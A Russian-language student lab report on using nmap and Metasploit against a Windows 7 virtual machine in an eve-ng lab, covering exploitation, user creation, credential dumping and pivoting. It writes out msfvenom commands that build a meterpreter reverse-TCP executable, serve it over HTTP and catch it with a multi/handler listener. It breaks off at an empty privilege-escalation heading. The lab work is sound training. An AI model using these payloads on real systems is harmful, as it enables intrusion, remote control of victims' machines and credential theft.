# Практическая работа №3
## Задание
https://sadykov.notion.site/3-MetaSplot-Framework-6552f5b12c7d4d9094a1b8f727df76f1
Построить инфраструктуру в eve-ng, пробросить порты. Просканировать с помощью nmap. Используя metasploit получить доступ к витруальной машине windows 7, создать нового пользователя, сделать скриншот рабочего стола, получить все учетные записи, находящиеся в памяти системы, выполнить проксирование трафика во внутреннюю инфраструктуру.
## Подготовка
### Термины:
- exploit - механизм, эксплуатирующий уязвимость
- auxiliary - проверяет, есть ли уязвимость для указанного эксплойта
- post - позволяет после эксплуатирования уязвимости выполнить ряд действий
- payload - вредоносная программа, выполняющаяся на взломанном устройстве после экспуатации уязвимости
- encoder - скрывает payload от антивирусных программ
- nops - позволяет скрыть свое поведение от эвристического анализатора (дословная цитата)
- evasion - позволяет внести коррективы в действия загруженной вредоносной программы

Инфраструктура сети.
## Проброс портов

Проброшенные 445 и 3389 порты.
## Сканирование портов

Результат сканирования.
## Запуск эксплойта
### Порядок действий таков:
- msfconsole, после этого можно поискать эксплойты для найденных nmap сервисов.
- search <название уязвимости, службы, чего угодно, что нашел nmap>
- use <номер из списка>
- show options (смотрим, все ли так, как нам нужно)
- если что-то не так, set <название параметра> <значение> (set rhosts <целевой ip>)
- run (запуск эксплойта, пэйлоад выберется автоматически)
- выйти из meterpreter, чтобы попробовать еще раз или изменить настройки bg
- show targets посмотреть упомянутые таргеты
- show payloads совместимые payloadы

## Вторая часть
Создание пользователя NEWUSER eve@123:


Скриншот экрана

Учетные записи

## msfvenom
Позволяет получить нужный payload по названию.
`msfvenom -p <название> LHOST=<ip kali> LPORT=<порт> -f <расширение> -o <результат>`
### Создание payload
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.129.134 -f exe -o meterpreter.exe`
Создает reverse tcp payload в формате exe программы для windows x64
### Передача payload на уязвимый компьютер
Как вариант можно воспользоваться python simplehttpserver.
`python -m http.server 80`
### Настройка сервера на kali
Для того, чтобы загруженному на компьютер жертвы reverse_tcp было куда подключаться, поднимем сервер на нашей машине. Для этого можно использовать exploit/multi/handler. Нужно указать, с какого payload к нему будут подключаться, а так же прослушиваемый адрес (интерфейс), установим туда 0.0.0.0, чтобы слушалось все.
```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
run
```
После этого мы получаем терминал компьютера жертвы. Так, гипотетически, жертва сама загрузила себе на компьютер RAT.
### Повышение прав